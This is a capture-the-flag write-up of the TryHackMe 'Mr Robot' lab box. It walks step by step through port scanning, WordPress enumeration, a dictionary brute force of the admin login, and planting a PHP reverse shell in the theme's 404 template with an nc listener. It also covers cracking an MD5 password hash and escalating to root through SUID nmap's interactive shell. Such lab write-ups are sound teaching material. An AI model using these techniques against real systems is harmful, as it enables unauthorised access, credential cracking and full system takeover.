THM Writeup – Mr Robot CTF

THM Writeup – Mr Robot CTF

Mr Robot

Based on the Mr. Robot show, can you root this box?

Room: Mr Robot CTF

Difficulty: Medium

Operating System: Linux

Author: ben

Mr Robot

Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them?

Credit to Leon Johnson for creating this machine.

Add IP address to your hosts file:

echo '10.10.178.185    robot.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open -min-rate 5000 -vvv robot.thm

PORT    STATE SERVICE REASON
80/tcp  open  http    syn-ack ttl 64
443/tcp open  https   syn-ack ttl 64

Get more details about open ports:

nmap -T4 -A -p 80,443 robot.thm

PORT    STATE SERVICE VERSION
80/tcp  open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03

We have ports 80 and 443 open – a web application running under Apache web server.

Check both ports – port 80 first – browse to http://robot.thm/:

http web app

There is very cool application.

Now port 443 – browse to https://robot.thm

https web app

It looks like exactly the same web application, just here it runs on port 443.

Looking for first key

Check the source code of the web site – view page source:

page source

At this point, I checked (tried) all those commands the web site provided us, but found really nothing of interest.

Directory bruteforce the web application:

root@ip-10-10-40-183:~# gobuster dir -u http://robot.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt


===============================================================
/index.php (Status: 301)
/index.html (Status: 200)
/images (Status: 301)
/blog (Status: 301)
/rss (Status: 301)
/sitemap (Status: 200)
/login (Status: 302)
/0 (Status: 301)
/feed (Status: 301)
/video (Status: 301)
/image (Status: 301)
/atom (Status: 301)
/wp-content (Status: 301)
/admin (Status: 301)
/audio (Status: 301)
/intro (Status: 200)
/wp-login (Status: 200)
/wp-login.php (Status: 200)
/css (Status: 301)
/rss2 (Status: 301)
/license (Status: 200)
/license.txt (Status: 200)
/wp-includes (Status: 301)
/js (Status: 301)
/wp-register.php (Status: 301)
/Image (Status: 301)
/wp-rss2.php (Status: 301)
/rdf (Status: 301)
/page1 (Status: 301)
/readme (Status: 200)
/readme.html (Status: 200)
/robots (Status: 200)
/robots.txt (Status: 200)
Progress: 2030 / 220561 (0.92%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================

As you can see I stopped the scan, because I had alread found what I wanted – is looks like it is a WordPress application with some interesting sites/files – /admin/login/robots.txt

Ok, now browse to http://robot.thm/login

wordpress login page

Yes, it is WordPress application, let’s gather more information:

root@ip-10-10-40-183:~# wpscan --url robot.thm -e vp,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.7
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://robot.thm/ [10.10.178.185]
[+] Started: Fri Feb 18 12:37:20 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache
 |  - X-Mod-Pagespeed: 1.9.32.3-4523
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://robot.thm/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://robot.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] The external WP-Cron seems to be enabled: http://robot.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://robot.thm/e7a3a7b.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://robot.thm/e7a3a7b.html, Match: 'WordPress 4.3.1'

[+] WordPress theme in use: twentyfifteen
 | Location: http://robot.thm/wp-content/themes/twentyfifteen/
 | Last Updated: 2022-01-25T00:00:00.000Z
 | Readme: http://robot.thm/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.1
 | Style URL: http://robot.thm/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://robot.thm/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==> (10 / 10) 100.00% Time: 00:00:00

[i] No Users Found.

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Fri Feb 18 12:37:35 2022
[+] Requests Done: 73
[+] Cached Requests: 6
[+] Data Sent: 14.682 KB
[+] Data Received: 17.923 MB
[+] Memory used: 238.102 MB
[+] Elapsed time: 00:00:15

We found out some interesting information:

  • there is robots.txt file – we’ll check that soon
  • XML-RPC is enabled
  • it is vulnerable/insecure WordPress version 4.3.1
  • theme used is twentyfifteen

Check /admin site now – browsing to http://robot.thm/admin, we are redirected to http://robot.thm/admin/index.html – the site is still refreshing, view the page source:

page source

It is the same web site (source) like before and I think we are not allowed to enter /admin/index.html because we don’t have the correct IP address…

Now check /robots.txt – browse to http://robot.thm/robots.txt

robots.txt

Hmmm, this is something we are interested in – it looks like we found the first key.

Open key-1-of-3.txt file by browsing to http://robot.thm/key-1-of-3.txt

key-1-of-3.txt

Looking for second key

To download fsocity.dic browse to http://robot.thm/fsocity.dic

XML-RPC is enabled so we can try to find login password by using dictionary we found:

root@ip-10-10-40-183:~# wpscan --url robot.thm --usernames elliot --passwords fsocity.dic --max-threads 50

I have to admit, first I ran this command with username mrrobot and as you can expect I didn’t reveal the password. Then I remembered the name elliot 🙂

Go to http://robot.thm/login and login with username elliot and password we’ve just obtained:

wordpress dashboard

Check what role is our user in – click Users:

wordpress users

Great news – our user is administrator.

We know that theme editors can be utilized to upload php reverse shells, we’ll upload one to the 404.php page:

root@ip-10-10-40-183:~# cp /usr/share/webshells/php/php-reverse-shell.php 404.php
root@ip-10-10-40-183:~# nano 404.php

So we copied the PHP reverse shell to our current working directory as 404.php, now open it and modify the IP address ($ip) and PORT ($port) parameters:

php reverse shell

In the WP administration go to Appearance > Editor > 404 Template (on the right):

wordpress 404 template

Copy the content of your 404.php, paste it as template and click Upload File:

wordpress 404 modified template

Start netcat listener:

nc -lnvp 4242

Browse to http://robot.thm/wp-content/themes/twentyfifteen/404.php (or http://robot.thm/?p=404.php) and we received reverse shell:

reverse shell

Note: http://robot.thm/?p=404.php did not work this time…

Upgrade the shell:

python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo; fg ENTER ENTER
stty rows 24 columns 80
export TERM=xterm-256color
reset

Look around – find the second key:

daemon@linux:/$ ls -lA /home/
total 4
drwxr-xr-x 2 root root 4096 Nov 13  2015 robot
daemon@linux:/$ ls -lA /home/robot/
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5

We found the second key, however we are not allowed to read it – only robot user has permissions to read it.

Anyway we found an interesting file named password.raw-md5, let’s check it out:

daemon@linux:/$ cat /home/robot/password.raw-md5 
robot:c3fcd3d76192e4007dfb496cca67e13b

That should be the robot’s password hash.

Copy the hash to a file on your attacking machine and try to crack it:

root@ip-10-10-40-183:~# echo 'c3fcd3d76192e4007dfb496cca67e13b' > hash
root@ip-10-10-40-183:~# john -w=/usr/share/wordlists/rockyou.txt --format=raw-md5 hash

[REDACTED] (?)

Great, we have robot’s password, so switch to robot user:

daemon@linux:/$ su robot
Password: 
robot@linux:/$

Read the second key:

robot@linux:/$ cat /home/robot/key-2-of-3.txt 
[REDACTED]

Looking for third key

Now, I guess, we need to be root to be able to read the third key – so we have to find privilege escation vector.

What robot user can do with sudo:

robot@linux:/$ sudo -l
[sudo] password for robot: 
Sorry, user robot may not run sudo on linux.

Check scheduled tasks:

robot@linux:/$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
21 * * * * bitnami cd /opt/bitnami/stats && ../agent.bin --run -D

Check executables with SUID bit set:

robot@linux:/$ find / -type f -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

Nah, finally we found something interesting – SUID bit set on nmap.

Check GTFOBins:

GTFOBins nmap suid

Ok, this is the way we can write to a file with elevated privileges, but we need to read the key…

First we have to run nmap in interactive mode and start a shell:

robot@linux:/$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)

As we can see our effective permissions are root.

So find the third key and read it:

# ls /root
firstboot_done	key-3-of-3.txt
# cat /root/key-3-of-3.txt
[REDACTED]

Do you like this writeup? Check out other THM Writeups.

Comments are closed.